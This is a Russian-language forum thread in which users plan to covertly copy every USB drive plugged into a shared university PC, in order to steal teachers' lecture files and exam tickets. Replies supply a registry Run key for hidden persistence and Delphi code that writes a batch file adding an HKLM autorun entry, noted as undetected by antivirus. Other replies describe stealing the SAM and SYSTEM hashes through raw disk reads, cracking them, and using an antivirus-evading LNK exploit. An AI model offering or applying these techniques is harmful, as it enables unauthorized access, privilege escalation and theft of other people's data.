|
Скрытое копирование флешки
|
|
antbert
|
Дата: Понедельник, 05.11.2012, 21:29 | Сообщение # 1
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
win xp. Учетка - Юзер.
Вставляется флешка. Нужно с нее скопировать всю информацию в директорию, которую я задам.
Процесс копирования должен идти скрытно)
Что подскажете? |
| |
|
|
|
|
|
antbert
|
Дата: Понедельник, 05.11.2012, 22:28 | Сообщение # 2
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Собственно все решено, кроме добавление в загрузку из-под юзера windows xp. Никогда этим не занимался  |
| |
|
|
|
|
|
xXxSh@dowxXx
|
Дата: Вторник, 06.11.2012, 10:56 | Сообщение # 3
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
Quote (antbert)
добавление в загрузку из-под юзера windows xp
врят ли получится скрытно это сделать, нужны более высокие права.
Сообщение отредактировал xXxSh@dowxXx - Вторник, 06.11.2012, 11:24
|
| |
|
|
|
|
|
antbert
|
Дата: Вторник, 06.11.2012, 15:16 | Сообщение # 4
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Хм, а создать ярлык и переместить его в папку автозагрузки не вариант?
Фар на п.к запускается из авторана, следовательно и доступ туда есть. |
| |
|
|
|
|
|
Don_Diego
|
Дата: Вторник, 06.11.2012, 16:32 | Сообщение # 5
|
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 253
Статус: Offline
|
Quote (antbert)
Хм, а создать ярлык и переместить его в папку автозагрузки не вариант?
Ну попробуй... Если антивируса нету - еще проскочит такой вариант ))
А вообще я к примеру пишу в:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
По крайней мере все кроме касперского молчит.
|
| |
|
|
|
|
|
dolphin
|
Дата: Вторник, 06.11.2012, 18:35 | Сообщение # 6
|
Администратор
Сообщений: 904
Статус: Offline
|
Quote (antbert)
win xp. Учетка - Юзер. Вставляется флешка. Нужно с нее скопировать всю информацию в директорию, которую я задам. Процесс копирования должен идти скрытно) Что подскажете?
Как я понял комп твой ну или к которому есть доступ напрямую, без "свидетелей", приходит друг вставляет флешку и всё с неё копируется тебе на комп, я правильно понял?
Просто сам недавно делал подобную программу с чуть более широким функционалом, могу подсказать как её сделать и поделится кодами.
|
| |
|
|
|
|
|
antbert
|
Дата: Вторник, 06.11.2012, 19:58 | Сообщение # 7
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Quote (dolphin)
Как я понял комп твой ну или к которому есть доступ напрямую, без "свидетелей", приходит друг вставляет флешку и всё с неё копируется тебе на комп, я правильно понял?
Просто сам недавно делал подобную программу с чуть более широким функционалом, могу подсказать как её сделать и поделится кодами.
Да, есть п.к, куда люди вставляют периодически флешки. user mod.
Мне необходимо каждую из них скопировать. Суть в том, что постоянного доступа к п.к у меня нет.
После размышлений я пришел к выводу, что оптимальный вариант такой - я вставляю свою флешку с определенным именем. Запускаю софтинку, которая делает ее скрытой для системы/меняет ее на значок харда/не дает доступ. учетки. После того, как вставляется иные флешки - файлы копируются на нее. Далее выдергиваю и ухожу.
Собственно это оптимальный вариант, по крайней мере для моего случая, подойдет иной, был бы рад, если бы поделились.
Сообщение отредактировал antbert - Вторник, 06.11.2012, 20:16
|
| |
|
|
|
|
|
link993
|
Дата: Вторник, 06.11.2012, 21:06 | Сообщение # 8
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
|
Вот собственно код на добавление в автозагрузку. Антивирусы пока не палят.
Code
procedure BatAutorun;
var
f:TextFile;
begin
AssignFile(f,'start.bat');
ReWrite(f);
WriteLn(f, 'reg add "hklm\software\microsoft\windows\currentversion\run" /v "root" /t reg_sz /d %WINDIR%\программа.exe /f ');
CloseFile(f);
end;
procedure start;
begin
WinExec('start.bat',WS_MAXIMIZE);
end;
begin
BatAutorun;
start;
end.
Только потом этот батник удалить нужно! Я думаю сам разберешься:3
|
| |
|
|
|
|
|
antbert
|
Дата: Вторник, 06.11.2012, 21:42 | Сообщение # 9
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Из-под юзера проверялся? |
| |
|
|
|
|
|
C@T
|
Дата: Среда, 07.11.2012, 01:27 | Сообщение # 10
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
моя идея конечно может показатся слишком хардкорной, но, если же этот комп один, или же их несколько но они обслуживаются в одном офисе(мне просто почему то кажется что ты хочешь заразить то место где люди ходят печатать какие то документы(у нас в универе такая аудитория есть, куда чутли не весь универ печатать рефераты, лабы и прочее ходит, сам когда то его заразить хотел, переписал для этого даже LNK експлоит, что бы он не палился(кстати, этот сплоит в добавок повышает привелегии)))
суть в чем, скопировать с того компа файла SAM и SYSTEM (хранятся C:\Windows\System32\config\RegBack) , в них хранятся хеши паролей юзеров, скопировать простым обрахом не получится, но можно скопировать эти файлы с винчестера, насколько я помню то открыть файл винчестера для чтения можно без прав администратора(даже под вин7), открыв файл винчестера на прямую и прочитав кластеры этого файла прямо с винчестера, можно сохранить этот файл на флешку, дальше взбрутить хеш пароля у себя на компе(программка SAMInside хорошо справляется) , дальше когда заведомо извесны логин и пароль администратора можно запустить свой процесс от администратора через API-шку CreateProcessAsUser (насколько я помню как она называется)
P.S ну или заюзать сплоит, под ХР сайчас много что работает, например тот же LNK, у меня с ним получалось шаманить так что не один русский антивирь его не палил |
| |
|
|
|
|
|
antbert
|
Дата: Среда, 07.11.2012, 01:35 | Сообщение # 11
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Quote (C@T)
моя идея конечно может показатся слишком хардкорной, но, если же этот комп один, или же их несколько но они обслуживаются в одном офисе(мне просто почему то кажется что ты хочешь заразить то место где люди ходят печатать какие то документы(у нас в универе такая аудитория есть, куда чутли не весь универ печатать рефераты, лабы и прочее ходит, сам когда то его заразить хотел, переписал для этого даже LNK експлоит, что бы он не палился(кстати, этот сплоит в добавок повышает привелегии)))
суть в чем, скопировать с того компа файла SAM и SYSTEM (хранятся C:\Windows\System32\config\RegBack) , в них хранятся хеши паролей юзеров, скопировать простым обрахом не получится, но можно скопировать эти файлы с винчестера, насколько я помню то открыть файл винчестера для чтения можно без прав администратора(даже под вин7), открыв файл винчестера на прямую и прочитав кластеры этого файла прямо с винчестера, можно сохранить этот файл на флешку, дальше взбрутить хеш пароля у себя на компе(программка SAMInside хорошо справляется) , дальше когда заведомо извесны логин и пароль администратора можно запустить свой процесс от администратора через API-шку CreateProcessAsUser (насколько я помню как она называется)
P.S ну или заюзать сплоит, под ХР сайчас много что работает, например тот же LNK, у меня с ним получалось шаманить так что не один русский антивирь его не палил
Практически так. У преподавателей на флешках есть все лекции в электронном виде, которые они не дают.
Так-же есть шанс того, что там будут билеты и прочая чушь. В общем попробовать как минимум стоит.
Хеши советую брутить либо по таблицам, либо ботнетом, либо по видюхе. В общем это не вопрос.
Сообщение отредактировал antbert - Среда, 07.11.2012, 01:35
|
| |
|
|
|
|
|
xXxSh@dowxXx
|
Дата: Четверг, 08.11.2012, 11:07 | Сообщение # 12
|
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
|
C@T отличная идея!
Quote (antbert)
У преподавателей на флешках есть все лекции в электронном виде, которые они не дают. smile
Так-же есть шанс того, что там будут билеты и прочая чушь
и тебе antbert спс, как то я даже об этом и не задумывался, хотя когда я учился у меня и так был доступ к компам в учительской 
|
| |
|
|
|
|
|
antbert
|
Дата: Воскресенье, 11.11.2012, 13:57 | Сообщение # 13
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Два человека описали свой код, но не показали. Странно) |
| |
|
|
|
|
|
antbert
|
Дата: Понедельник, 12.11.2012, 23:27 | Сообщение # 14
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Хм, видимо попросить нужно.
Не могли бы вы показать результаты своей работы. |
| |
|
|
|
|
|
Marra_Kesh
|
Дата: Четверг, 15.11.2012, 17:45 | Сообщение # 15
|
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
|
antbert, http://code.progler.ru/get/697 Если конечно Я тебя правильно понял...
|
| |
|
|
|
|
|
antbert
|
Дата: Четверг, 15.11.2012, 19:17 | Сообщение # 16
|
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
|
Да, это, правда "не тестировалась", ну это не трудно. |
| |
|
|
|
